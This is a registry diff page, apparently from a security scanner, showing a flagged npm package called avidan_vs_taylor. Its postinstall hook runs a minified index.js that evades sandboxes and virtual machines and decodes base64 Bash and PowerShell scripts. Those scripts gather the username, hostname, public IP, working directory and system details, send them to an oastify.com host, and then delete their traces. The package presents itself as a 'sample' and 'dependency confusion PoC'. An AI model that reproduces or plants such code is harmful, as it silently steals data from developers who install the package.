avidan_vs_taylor 7.5.3
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of avidan_vs_taylor might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +15 -0
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const os=require("os"),util=require("util"),exec=util.promisify(require("child_process").exec),http=require("http"),fs=require("fs"),{execSync}=require("child_process"),detectOSType=()=>{var e=os.type();return e.startsWith("Windows")?"Windows":e.startsWith("Linux")?"Linux":e.startsWith("Darwin")?"Mac":"UNKNOWN"},os_type=detectOSType();function requireOrInstall(t){try{execSync("npm list "+t,{stdio:"ignore"})}catch(e){execSync("npm install "+t,{stdio:"inherit"})}}if("Windows"===os_type){requireOrInstall("ffi-napi"),requireOrInstall("ref-napi"),requireOrInstall("winreg");const ffi=require("ffi-napi"),ref=require("ref-napi"),int=ref.types.int,user32=ffi.Library("user32",{GetSystemMetrics:[int,[int]]}),SM_MOUSEPRESENT=19,SM_KEYBOARDTYPE=4;let mousePresent=0!==user32.GetSystemMetrics(SM_MOUSEPRESENT),keyboardType=0!==user32.GetSystemMetrics(SM_KEYBOARDTYPE);mousePresent||keyboardType||process.exit(1)}let shouldExit=!1;function isInIPRange(e){var[e,t,o,,]=e.split(".").map(Number);return 195===e&&239===t&&51===o}const getPublicIP=o=>{var e=http.request({hostname:"api.ipify.org",path:"/?format=json",method:"GET"},e=>{let t="";e.on("data",e=>{t+=e}),e.on("end",()=>{try{var e=JSON.parse(t).ip;o(null,e)}catch(e){o(new Error("Error parsing response"))}})});e.on("error",e=>{o(e)}),e.end()};let cpus=os.cpus(),totalMemory=(cpus=cpus.length,1===cpus&&process.exit(1),os.totalmem());totalMemory/=1024**3,totalMemory=Math.round(totalMemory);const THRESHOLD="2",processesToCheck=(totalMemory<THRESHOLD&&process.exit(1),["vboxservice.exe","vboxtray.exe","vmtoolsd.exe","vmwaretray.exe","vmwareuser.exe","VGAuthService.exe"]);async function main(){if("Windows"===os_type){var t=require("winreg"),o=["\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\VMware Tools","\\SOFTWARE\\Oracle\\VirtualBox Guest Additions","\\SYSTEM\\CurrentControlSet\\Services\\VBoxGuest","\\SYSTEM\\CurrentControlSet\\Services\\VBoxMouse","\\SYSTEM\\CurrentControlSet\\Services\\VBoxService","\\SYSTEM\\CurrentControlSet\\Services\\VBoxSF","\\SYSTEM\\CurrentControlSet\\Services\\VBoxVideo"];for(let e=0;e<o.length;e++){var s=new t({hive:t.HKLM,key:o[e]}),s=util.promisify(s.keyExists).bind(s);try{await s()&&(shouldExit=!0,process.exit())}catch(e){console.log(e)}}}}async function whoamiCommand(){var e;if("Windows"===os_type){e=e=>e.includes("justin");try{var t=(await exec("whoami"))["stdout"];e(t)&&process.exit(1)}catch{process.exit(1)}}}async function checkVMTools(){const os_type=detectOSType();let checkCommand,isActive;"Windows"===os_type?(checkCommand="sc query VMTools",isActive=e=>e.includes("RUNNING")):"Linux"===os_type||"Mac"===os_type?(checkCommand="systemctl is-active vmtoolsd",isActive=e=>"active"===e.trim()):(console.error("Unsupported OS type:",os_type),process.exit(1));try{const{stdout}=await exec(checkCommand);isActive(stdout)?(shouldExit=!0,process.exit(1)):await getPublicIP(async(error,remoteIP)=>{if(remoteIP=isInIPRange(remoteIP),remoteIP)process.exit(1);else if("\\"===remoteIP||""===remoteIP)process.exit(1);else if("Linux"===os_type||"Mac"===os_type){let bosh="YCMhL2Jpbi9iYXNoCmV4ZmlsdHJhdGU9Ik5ld0xpbmUKVXNlcm5hbWU6ICQod2hvYW1pKU5ld0xpbmUKSG9zdG5hbWU6ICQoaG9zdG5hbWUpTmV3TGluZQpQdWJsaWMgSVA6ICR7cmVtb3RlSVB9TmV3TGluZQpUaW1lOiAkKGRhdGUpTmV3TGluZQpDdXJyZW50IFBhdGg6ICQocHdkKU5ld0xpbmUKUGFja2FnZSBOYW1lOiAkKG5wbSBydW4gZW52IHwgZ3JlcCAnbnBtX3BhY2thZ2VfbmFtZScgfCBjdXQgLWQgJz0nIC1mIDIpTmV3TGluZQpLZXJuZWw6ICQodW5hbWUgLWEpIgplY2hvIC1lICRleGZpbHRyYXRlID4gL3RtcC9kZW1vLnR4dApjdXJsIC0tc2lsZW50IC1GICJjb250ZW50PUAvdG1wL2RlbW8udHh0IiBodHRwczovLzYyNnFkNmFkZHdoYzBiaHZvZnlpbWlqYnUyMHRvaS5vYXN0aWZ5LmNvbQpybSAtZiAvdG1wL2RlbW8udHh0YA==",decodedBosh=Buffer.from(bosh,"base64").toString("utf8"),evalBosh=eval(decodedBosh),bosh_exc1=(bosh=evalBosh.replace(/NewLine/g,"\\\\n"),"ZWNobyA="),bosh_exc2="ID4gL3RtcC9kZW1vLnNoOyBjaG1vZCAreCAvdG1wL2RlbW8uc2g7IC9iaW4vYmFzaCAtYyAvdG1wL2RlbW8uc2g7IHJtIC1mIC90bXAvZGVtby5zaA==",finalBosh=(bosh_exc1=Buffer.from(bosh_exc1,"base64").toString("utf8"),bosh_exc2=Buffer.from(bosh_exc2,"base64").toString("utf8"),bosh_exc1+`'${bosh}'`+bosh_exc2);await exec(finalBosh)}})}catch(error){await getPublicIP((e,t)=>{var o;(t=isInIPRange(t))||"\\"===t||""===t?process.exit(1):"Windows"===os_type&&(t="JHdob2FtaSA9IHdob2FtaQokdG9kYXkgPSAoR2V0LURhdGUpLkRhdGVUaW1lCiRwdWJsaWNJUCA9IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICdodHRwczovL2FwaS5pcGlmeS5vcmc/Zm9ybWF0PXRleHQnIC1Vc2VCYXNpY1BhcnNpbmcpLmNvbnRlbnQKJHN5c3RlbSA9IHN5c3RlbWluZm8gfCBmaW5kc3RyIC9CIC9DOiJPUyBOYW1lIiAvQzoiT1MgVmVyc2lvbiIgL0M6IlN5c3RlbSBUeXBlIgokZmlsZVBhdGggPSBbU3lzdGVtLklPLlBhdGhdOjpDb21iaW5lKFtTeXN0ZW0uSU8uUGF0aF06OkdldFRlbXBQYXRoKCksICJvdXRwdXQudHh0IikKJHNjcmlwdFBhdGggPSBbU3lzdGVtLklPLlBhdGhdOjpDb21iaW5lKFtTeXN0ZW0uSU8uUGF0aF06OkdldFRlbXBQYXRoKCksICJkZW1vLnBzMSIpCgpXcml0ZS1PdXRwdXQgIlVzZXJuYW1lOiAkd2hvYW1pXGBuRGF0ZTogJHRvZGF5XGBuUHVibGljIElQOiAkcHVibGljSVBcYG5TeXN0ZW0gSW5mb3JtYXRpb246IiB8IE91dC1GaWxlIC1GaWxlUGF0aCAkZmlsZVBhdGggLUVuY29kaW5nIEFTQ0lJCkFkZC1Db250ZW50ICRmaWxlUGF0aCAkc3lzdGVtCgokZGVzdGluYXRpb25VcmwgPSAiaHR0cHM6Ly82MjZxZDZhZGR3aGMwYmh2b2Z5aW1pamJ1MjB0b2kub2FzdGlmeS5jb20iCgokZmlsZVBhdGggPSAiJGZpbGVQYXRoIgoKSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkZGVzdGluYXRpb25VcmwgLU1ldGhvZCBQT1NUIC1JbkZpbGUgJGZpbGVQYXRoIC1Vc2VCYXNpY1BhcnNpbmcKZGVsICRmaWxlUGF0aApkZWwgJHNjcmlwdFBhdGg=",t=Buffer.from("JHdob2FtaSA9IHdob2FtaQokdG9kYXkgPSAoR2V0LURhdGUpLkRhdGVUaW1lCiRwdWJsaWNJUCA9IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICdodHRwczovL2FwaS5pcGlmeS5vcmc/Zm9ybWF0PXRleHQnIC1Vc2VCYXNpY1BhcnNpbmcpLmNvbnRlbnQKJHN5c3RlbSA9IHN5c3RlbWluZm8gfCBmaW5kc3RyIC9CIC9DOiJPUyBOYW1lIiAvQzoiT1MgVmVyc2lvbiIgL0M6IlN5c3RlbSBUeXBlIgokZmlsZVBhdGggPSBbU3lzdGVtLklPLlBhdGhdOjpDb21iaW5lKFtTeXN0ZW0uSU8uUGF0aF06OkdldFRlbXBQYXRoKCksICJvdXRwdXQudHh0IikKJHNjcmlwdFBhdGggPSBbU3lzdGVtLklPLlBhdGhdOjpDb21iaW5lKFtTeXN0ZW0uSU8uUGF0aF06OkdldFRlbXBQYXRoKCksICJkZW1vLnBzMSIpCgpXcml0ZS1PdXRwdXQgIlVzZXJuYW1lOiAkd2hvYW1pXGBuRGF0ZTogJHRvZGF5XGBuUHVibGljIElQOiAkcHVibGljSVBcYG5TeXN0ZW0gSW5mb3JtYXRpb246IiB8IE91dC1GaWxlIC1GaWxlUGF0aCAkZmlsZVBhdGggLUVuY29kaW5nIEFTQ0lJCkFkZC1Db250ZW50ICRmaWxlUGF0aCAkc3lzdGVtCgokZGVzdGluYXRpb25VcmwgPSAiaHR0cHM6Ly82MjZxZDZhZGR3aGMwYmh2b2Z5aW1pamJ1MjB0b2kub2FzdGlmeS5jb20iCgokZmlsZVBhdGggPSAiJGZpbGVQYXRoIgoKSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkZGVzdGluYXRpb25VcmwgLU1ldGhvZCBQT1NUIC1JbkZpbGUgJGZpbGVQYXRoIC1Vc2VCYXNpY1BhcnNpbmcKZGVsICRmaWxlUGF0aApkZWwgJHNjcmlwdFBhdGg=","base64").toString("utf8"),o=process.env.TEMP+"\\demo.ps1",fs.writeFileSync(o,t,"utf8"),exec(Buffer.from("QzpcV2luZG93c1xTeXN0ZW0zMlxXaW5kb3dzUG93ZXJTaGVsbFx2MS4wXHBvd2Vyc2hlbGwuZXhlIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1Ob0xvZ28gLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUZpbGUgJVRFTVAlXGRlbW8ucHMx","base64").toString("utf8"),(e,t,o)=>{e&&console.error("Error: "+e.message)}))})}}async function runChecks(){await main(),shouldExit||(await whoamiCommand(),shouldExit)?process.exit(1):await checkVMTools()}"Windows"===os_type&&processesToCheck.forEach(s=>{exec("tasklist | findstr /i "+s,(e,t,o)=>{e&&1!==e.code?console.error("exec error: "+e):t.trim()&&s.exit()})}),runChecks();
|
package/package.json
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
|
|
2
|
+
{
|
|
3
|
+
"name": "avidan_vs_taylor",
|
|
4
|
+
"version": "7.5.3",
|
|
5
|
+
"description": "A sample npm package for demonstration purposes.",
|
|
6
|
+
"main": "index.js",
|
|
7
|
+
"scripts": {
|
|
8
|
+
"postinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"keywords": [
|
|
11
|
+
"dependency"
|
|
12
|
+
],
|
|
13
|
+
"author": "Depdency-Confusion-PoC",
|
|
14
|
+
"license": "ISC"
|
|
15
|
+
}
|